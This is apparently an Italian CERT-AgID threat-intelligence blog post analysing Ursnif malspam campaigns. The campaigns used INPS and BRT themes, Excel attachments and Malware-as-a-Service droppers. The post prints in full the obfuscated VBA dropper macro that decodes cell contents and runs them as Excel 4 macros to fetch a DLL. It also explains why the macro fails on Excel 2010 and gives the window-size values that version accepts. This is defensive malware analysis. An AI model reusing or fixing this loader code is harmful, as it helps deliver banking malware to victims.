IMPORTANTE

IoC 08/10/2021

CERT-AgID semplifica l’accesso ai propri Indicatori di Compromissione (IoC)

Fino ad oggi per accedere agli indicatori delle campagne malevole gestiti e censiti quotidianamente dal CERT-AGID era necessario disporre di tre requisiti: Essere una Pubblica Amministrazione; Accreditarsi presso il CERT-AGID; Dotarsi di una opportuna instanza MISP o del client di interfacciamento CNTI sviluppato dallo stesso CERT-AgID. Mentre i primi due requisiti resteranno invariati in quanto […]

La campagna Ursnif che non colpisce Office 2010 e le conseguenze del MaaS

07/10/2020

Ursnif

Nella giornata di ieri sono state veicolate diverse campagne Ursnif, alcune a tema “Delivery” (spedizioni BRT) ed una a tema “INPS” (che continua anche oggi).

Le campagne a tema “INPS” seguono la stessa metodologia: allegati XLS e drop-URL (per scaricare la DLL dello stadio successivo) dichiarata come una costante in chiaro all’interno di uno sheet nascosto.

Esempio di drop-URL in chiaro nella campagna odierna di Ursnif

Le campagne Ursnif veicolate nella giornata di ieri a tema “Delivery” (BRT) utilizzano una tecnica differente. Il file allegato è un XLSm, mentre la drop-URL per scaricare la DLL è offuscata nelle celle e decodificata dalla macro che, stranamente, come ci fa notare @reecdeep, manda in crash Excel su Any.Run.

Analizzando il codice macro ed effettuando il debug localmente, si evince che l’errore è dovuto alle proprietà di ActiveWindow con .Height e .Width pari ad 1.

Di seguito il codice macro per esteso

Sub BRTSpA()
c = 3: v = 1
With ActiveWindow
.WindowState = xlNormal
.Top = v
.Left = v
.Height = v
.Width = v
For Each p In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): n = n & p: Next
For X = c To Len(n) Step c
If (X Mod 2) Then k = -1 Else k = v
u = u & Chr(Asc(Mid(n, X, 1)) + k): Next
IR = Split(u, "<")
For Each E In IR
Debug.Print Replace(E, "[", "J")
ExecuteExcel4Macro Replace(E, "[", "J")
Next
m = 1: ActiveWorkbook.Close v - m
End With
End Sub
Private Sub per_Layout(ByVal Index As Long)
i = 9: BRTSpA
End Sub

I valori di .Height e .Width impongono un resize del documento Excel a dimensioni 1×1 che a quanto pare non vengono accettate dalle versioni Office 2010 in uso da sandbox come AnyRun.

È quindi probabile che la campagna di ieri non sia andata a “buon fine” sulle macchine che usano una versione di Excel inferiore alla 2013.

In particolare, versioni di Excel come la 2010 o minori fungono da scudo contro la campagna Ursnif di ieri.

Dalle analisi effettuate dal CERT-AGID, i valori minimi accettati di .Height e .Width per ActiveWindow su Excel 2010 devono essere rispettivamente maggiori di 30 e di 14.

Da ulteriori analisi del sample su macchina Windows 7 con Excel 2013, non è stato riscontrato alcun errore. La macro lavora correttamente e provvede a contattare la dropurl da cui scaricare la DLL per poi proseguire con la catena di infezione.
E’ ipotizzabile che gli autori della macro dispongano quindi di una versione di Excel superiore o pari alla 2013.

Malware as a service

Sebbene questo non riguardi Ursnif in sè (che è un malware storico che non risulta appoggiarsi a servizi terzi), non è la prima volta che il CERT-AGID incontra campagne con malware malconfigurato, in particolare i packer e dropper forniti da terze parti (come parte di un modello Malware-as-a-Service) sono a volte privi della giusta configurazione.

Capita inoltre che gli intenti degli autori di packer e dropper non combacino nè tra di loro nè con quelli degli autori del malware, soprattutto per quel che riguarda il parco vittime supportato.
Abbiamo rilevato spesso packer funzionanti solo su alcune versioni di Windows e malware in grado di infettare una più vasta gamma di queste (“sprecando” quindi opportunità di infezione).

Il fenomeno getta una luce inquietante sul panorama delle campagne malware: criminali sempre meno capaci hanno la possibilità di condurre campagne fruttuose grazie alla disponibilità di strumenti pronti e facili da usare.

Considerando l’asimmetria tra il ruolo di attaccante (dove un unico successo è comunque fruttuoso) e quello di difensore (dove ogni singolo fallimento è dannoso), la crescita del mercato dei Malware-as-a-Service dovrà imporre un cambiamento sulle linee di azione degli attori in difesa, al fine di rendere inefficace questo modello prima ancora che combatterne gli effetti.

Taggato  Ursnif